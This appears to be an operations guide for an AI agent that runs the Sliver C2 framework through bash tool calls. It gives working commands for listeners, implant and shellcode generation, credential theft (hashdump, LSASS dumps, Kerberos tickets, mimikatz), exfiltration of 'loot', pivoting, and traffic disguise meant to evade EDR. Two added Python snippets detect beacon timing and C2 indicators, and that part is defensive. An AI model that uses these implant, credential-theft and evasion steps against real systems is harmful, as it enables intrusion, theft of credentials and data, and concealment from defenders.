Sliver C2 framework operations — server connection, listener setup, implant generation, BOF/Armory extensions, post-implant operations, HTTP C2 profiles.
Sliver is an open-source, cross-platform adversary emulation framework by BishopFox. It supports beacon (async) and session (interactive) implants over mTLS, HTTPS, DNS, and WireGuard channels with multi-operator support.
- Server: `c2-sliver` container on `sandbox-net` (daemon mode, gRPC on port 31337)
- Client: `sliver-client` pre-installed in sandbox
- Config: Auto-generated operator config at `/workspace/.sliver-configs/decepticon.cfg`

Connection Procedure (via bash tool)

```
# 1. Verify C2 reachable
bash(command="nc -z c2-sliver 31337 && echo 'C2_OK' || echo 'C2_DOWN'")

# 2. Import operator config (once — skip if already imported)
bash(command="ls ~/.sliver-client/configs/ 2>/dev/null | grep -q . || sliver-client import /workspace/.sliver-configs/decepticon.cfg")

# 3. Start interactive console in dedicated tmux session
bash(command="sliver-client console", session="c2")

# 4. Run Sliver commands interactively
bash(command="https --lhost 0.0.0.0 --lport 443 --domain c2-sliver", is_input=True, session="c2")
bash(command="sessions", is_input=True, session="c2")
```
IMPORTANT:

- `/workspace/.sliver-configs/decepticon.cfg`
- `sliver-server` in sandbox — the server runs in its own container
- `sliver-client console` is interactive — MUST use a dedicated session (e.g. `session="c2"`) and send subsequent commands with `is_input=True`
- `bash(command="sliver-client console --config ~/.sliver-client/configs/decepticon_c2-sliver.cfg", session="c2")`

All commands below run inside the Sliver console (`session="c2"`, `is_input=True`).
```
# Basic HTTPS listener on 443
https --lhost 0.0.0.0 --lport 443 --domain c2-sliver

# HTTPS with custom certificate (better OPSEC)
https --lhost 0.0.0.0 --lport 443 --domain c2-sliver \
  --cert /workspace/certs/cert.pem \
  --key /workspace/certs/key.pem

# HTTPS with Let's Encrypt (requires DNS control)
https --lhost 0.0.0.0 --lport 443 --domain c2-sliver --lets-encrypt

# DNS listener — requires NS record pointing to C2 server
dns --domains c2.<TARGET> --lport 53

# Verify DNS resolution
dig @c2-sliver test.c2.<TARGET> TXT +short

# mTLS — encrypted, mutual authentication (recommended for internal pivoting)
mtls --lhost 0.0.0.0 --lport 8888

# mTLS on non-standard port
mtls --lhost 0.0.0.0 --lport 8443

# WireGuard tunnel — full network access through implant
wg --lhost 0.0.0.0 --lport 51820
```
CRITICAL — Compilation Timeout: Sliver's `generate` command compiles a Go binary from source. This takes 2-10 minutes depending on options. The spinner animation (`⠴ Compiling, please wait ...`) keeps the screen active, so stall detection will NOT trigger early.

Rules:

- ALWAYS use `--skip-symbols` — reduces compilation time from ~5 min to ~30 sec
- ALWAYS use `--save <path>` — saves implant directly to the target directory. Do NOT rely on the default save location and then `cp` — file copy may fail on bind-mounted volumes (WSL2/NTFS "Invalid argument" error).
- Use a longer timeout for generate commands: `bash(command="generate ...", is_input=True, session="c2", timeout=300)`

Example (correct):

```
bash(command="generate --os linux --arch amd64 --mtls c2-sliver:8888 --skip-symbols --save /workspace/<slug>/exploit/", is_input=True, session="c2", timeout=300)
```
```
# Windows beacon via mTLS with jitter
generate beacon --mtls c2-sliver:8888 --os windows --arch amd64 \
  --seconds 30 --jitter 50 --skip-symbols \
  --name win_beacon \
  --save /workspace/<slug>/exploit/

# Windows beacon via HTTPS
generate beacon --https c2-sliver:443 --os windows --arch amd64 \
  --seconds 60 --jitter 30 --skip-symbols \
  --save /workspace/<slug>/exploit/

# Linux beacon via DNS (low-and-slow)
generate beacon --dns c2-sliver --os linux --arch amd64 \
  --seconds 120 --jitter 70 --skip-symbols \
  --name lin_dns \
  --save /workspace/<slug>/exploit/

# Windows session — persistent connection, immediate response
generate --mtls c2-sliver:8888 --os windows --arch amd64 \
  --skip-symbols --name win_session \
  --save /workspace/<slug>/exploit/

# Linux session via HTTPS
generate --https c2-sliver:443 --os linux --arch amd64 \
  --skip-symbols --name lin_https \
  --save /workspace/<slug>/exploit/

# TCP stager — downloads full implant after initial execution
generate stager --lhost c2-sliver --lport 8443 --protocol tcp \
  --os windows --arch amd64 \
  --save /workspace/<slug>/exploit/stager.bin

# Raw shellcode for process injection / custom droppers
generate --mtls c2-sliver:8888 --os windows --arch amd64 \
  --format shellcode --skip-symbols \
  --save /workspace/<slug>/exploit/shellcode.bin
```

| Format | Flag | Use Case |
|---|---|---|
| EXE | --format exe | Direct execution |
| Shared library | --format shared | DLL sideloading |
| Shellcode | --format shellcode | Injection, custom loaders |
| Service | --format service | Windows service persistence |
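
The beacon commands above pair a base interval (`--seconds`) with `--jitter`, which leaves a recognisable timing pattern on the wire. The following is an added example, not part of the original page or of Sliver, that flags source/destination pairs whose connection gaps stay inside a bounded band. It assumes jitter is a bounded random delay added to the base interval; the record layout, hostnames and thresholds are constructed for illustration.

```python
from collections import defaultdict

def _series(start, deltas, src, dst):
    """Build constructed flow records (epoch_seconds, src, dst) from a list of gaps."""
    t, out = start, [(start, src, dst)]
    for d in deltas:
        t += d
        out.append((t, src, dst))
    return out

# Constructed sample flows, not real telemetry.
FLOWS = (
    # gaps between 30 s and 80 s, as a 30 s interval with up to 50 s jitter would give
    _series(1000.0, [31, 74, 52, 45, 66, 38, 79, 58], "10.0.0.5", "c2.example.test")
    # interactive browsing: sub-second bursts mixed with long idle periods
    + _series(1000.0, [0.2, 0.4, 1.1, 95, 0.3, 0.8, 640, 0.5], "10.0.0.7", "news.example.test")
    # too few events to judge
    + _series(1000.0, [60, 61], "10.0.0.9", "ntp.example.test")
)

def find_beacons(flows, min_events=6, min_gap=5.0, max_ratio=3.0):
    """Return {(src, dst): (min_gap_seen, max_gap_seen)} for beacon-like pairs.

    A client sleeping base + random(0..jitter) never bursts (gap >= base) and
    never goes quiet (gap <= base + jitter), so max_gap / min_gap stays small.
    """
    by_pair = defaultdict(list)
    for ts, src, dst in flows:
        by_pair[(src, dst)].append(ts)
    hits = {}
    for pair, stamps in by_pair.items():
        stamps.sort()
        gaps = [b - a for a, b in zip(stamps, stamps[1:])]
        if len(gaps) < min_events - 1:
            continue  # not enough check-ins to say anything
        lo, hi = min(gaps), max(gaps)
        if lo >= min_gap and hi / lo <= max_ratio:
            hits[pair] = (lo, hi)
    return hits

if __name__ == "__main__":
    for (src, dst), (lo, hi) in find_beacons(FLOWS).items():
        print(f"{src} -> {dst}: gaps {lo:.0f}-{hi:.0f}s")
```

Session implants hold a persistent connection and do not produce this pattern; look for long-lived flows instead.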
```
# Skip debug symbols (smaller, harder to reverse, MUCH faster compile)
generate --mtls c2-sliver:8888 --os windows --skip-symbols

# Limit implant size
generate --mtls c2-sliver:8888 --os windows --format shellcode --skip-symbols

# List active sessions / beacons
sessions
beacons

# Interact with session
use <SESSION_ID>

# Interact with beacon
use <BEACON_ID>

# Background current session
background

# Kill session
sessions -k <SESSION_ID>

# Rename implant
rename -n <NEW_NAME>

# After `use <SESSION_ID>`
whoami      # Current user
getuid      # User ID
getgid      # Group ID
getprivs    # Token privileges
info        # Full implant info

# System enumeration
shell systeminfo
shell ipconfig /all
shell net user
shell net localgroup administrators
shell tasklist /v

# Environment
env
pwd
ls

# Download from target
download C:\\Users\\<USER>\\Documents\\sensitive.docx /workspace/<slug>/post-exploit/loot/

# Upload tool to target
upload /workspace/<slug>/exploit/implants/SharpHound.exe C:\\Windows\\Temp\\

# List directory
ls C:\\Users\\<USER>\\Desktop\\

# List processes
ps

# Process injection (migrate to another process for stealth)
migrate <PID>

# Execute .NET assembly in memory (no disk touch)
execute-assembly /workspace/tools/Seatbelt.exe -group=all

# Sideload DLL (reflective loading)
sideload /workspace/tools/mimikatz.dll

# Screenshot
screenshot

# Spawn new process
shell notepad.exe

# Dump SAM hashes (requires SYSTEM/admin)
hashdump

# Kerberos ticket extraction
execute-assembly /workspace/tools/Rubeus.exe dump

# DPAPI credential access
execute-assembly /workspace/tools/SharpDPAPI.exe triage

# Comprehensive host audit
execute-assembly /workspace/tools/Seatbelt.exe -group=all
```

Beacon Object Files (BOFs) execute position-independent C code in the implant process — no new process creation, no disk writes.
```
# List available extensions
armory

# Install extension from armory
armory install sa-ldapsearch
armory install nanodump
armory install credman
armory install situational-awareness

# Update all installed extensions
armory update

# LDAP enumeration (no LDAP tool needed on target)
sa-ldapsearch -- "(objectClass=user)"
sa-ldapsearch -- "(objectClass=computer)"

# Process dump with nanodump (LSASS without Mimikatz)
nanodump -w C:\\Windows\\Temp\\debug.dmp

# Credential manager access
credman

# Situational awareness (whoami, env, network)
situational-awareness
```

| Feature | BOF | execute-assembly |
|---|---|---|
| Process creation | None (runs in implant) | Fork & run (new process) |
| Disk artifacts | None | .NET assembly loaded |
| EDR visibility | Low (in-process) | Medium (CLR load event) |
| Size | Small (KBs) | Larger (full .NET binary) |
| Flexibility | C only | Any .NET assembly |
```
# Route traffic through implant into target network
socks5 start -p 1080

# Use from sandbox with proxychains:
# proxychains nmap -sT -Pn <INTERNAL_HOST>

# Forward local port to remote service through implant
portfwd add -b 127.0.0.1:9090 -r <INTERNAL_HOST>:445

# List active port forwards
portfwd

# Remove forward
portfwd rm -i <ID>

# Expose sandbox service to target network via implant
rportfwd add -b <INTERNAL_HOST>:8080 -r 127.0.0.1:8080

# Create pivot listener on compromised host — new implants connect through it
pivots tcp --bind 0.0.0.0:9898

# Generate implant that connects via pivot
generate --tcp-pivot <PIVOT_HOST>:9898 --os windows

# WireGuard port forward for full tunnel
wg-portfwd add --remote <INTERNAL_HOST>:3389 --bind 127.0.0.1:3389
```

Custom profiles shape C2 traffic to mimic legitimate application traffic.
```json
{
  "implant_config": {
    "user_agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36",
    "url_parameters": [
      { "name": "session", "value": "{{.GUID}}", "probability": 100 }
    ],
    "headers": [
      { "name": "Accept", "value": "text/html,application/xhtml+xml", "probability": 100 },
      { "name": "Accept-Language", "value": "en-US,en;q=0.9", "probability": 100 }
    ]
  },
  "server_config": {
    "headers": [
      { "name": "Content-Type", "value": "text/html; charset=utf-8", "probability": 100 },
      { "name": "Server", "value": "Microsoft-IIS/10.0", "probability": 100 },
      { "name": "X-Powered-By", "value": "ASP.NET", "probability": 100 }
    ]
  }
}
```
Save to `profiles/sliver_https.json` and apply when starting the HTTPS listener.

| Indicator | Pattern | Mitigation |
|---|---|---|
| Default HTTP headers | Server: Apache/2.4.x + unique header combo | Use custom HTTP C2 profile |
| Default URI patterns | /login.php, /admin/login, /index.php | Custom URI paths |
| mTLS on non-standard ports | Outbound to unusual port (8888) | Use 443/8443 |
| DNS TXT encoding | Base64 TXT > 255 bytes | Fragment, short polling |
| Implant file hashes | Known Sliver samples in VirusTotal | --skip-symbols, custom loaders |
| JA3/JA3S fingerprints | TLS patterns unique to Sliver | Process injection into browser |
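
Seen from the monitoring side, three rows of this table (default URI paths, outbound port 8888, oversized Base64 TXT answers) can be checked directly against proxy, flow and DNS logs. The following is an added example, not part of the original page or of Sliver, that correlates them per source host, since each one alone is common in benign traffic. The event schema, addresses and the two-indicator threshold are assumptions constructed for illustration.

```python
import base64
import binascii
from collections import defaultdict

DEFAULT_URIS = {"/login.php", "/admin/login", "/index.php"}  # from the table above
UNUSUAL_PORTS = {8888}                                        # from the table above
TXT_LIMIT = 255                                               # bytes, from the table above

# Constructed sample events, not real telemetry.
EVENTS = [
    {"type": "http", "src": "10.0.0.5", "dst": "203.0.113.10", "path": "/admin/login?x=1"},
    {"type": "flow", "src": "10.0.0.5", "dst": "203.0.113.10", "dport": 8888},
    {"type": "dns", "src": "10.0.0.5", "qtype": "TXT",
     "answer": base64.b64encode(b"A" * 300).decode()},
    {"type": "http", "src": "10.0.0.7", "dst": "198.51.100.4", "path": "/index.php"},
    {"type": "dns", "src": "10.0.0.7", "qtype": "TXT",
     "answer": "v=spf1 include:example.test -all"},
    {"type": "flow", "src": "10.0.0.8", "dst": "198.51.100.9", "dport": 443},
]

def _is_base64(text):
    """True if the whole string decodes as strict Base64."""
    try:
        base64.b64decode(text, validate=True)
        return True
    except (binascii.Error, ValueError):
        return False

def indicators(ev):
    """Return the set of table indicators a single event matches."""
    found = set()
    if ev["type"] == "http" and ev["path"].split("?", 1)[0] in DEFAULT_URIS:
        found.add("default_uri")
    if ev["type"] == "flow" and ev["dport"] in UNUSUAL_PORTS:
        found.add("unusual_port")
    if (ev["type"] == "dns" and ev["qtype"] == "TXT"
            and len(ev["answer"]) > TXT_LIMIT and _is_base64(ev["answer"])):
        found.add("large_b64_txt")
    return found

def triage(events, min_distinct=2):
    """Map each source host to its distinct indicators, keeping hosts with >= min_distinct."""
    per_src = defaultdict(set)
    for ev in events:
        per_src[ev["src"]] |= indicators(ev)
    return {src: sorted(hits) for src, hits in per_src.items() if len(hits) >= min_distinct}

if __name__ == "__main__":
    print(triage(EVENTS))
```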
- `sliver-client` connects to `c2-sliver` server successfully
- `whoami`, `ps`, `ls`)
- `references/sliver-quickstart.md` — Compact command reference for Sliver architecture, listeners, implant generation, post-implant ops, pivoting, and OPSEC.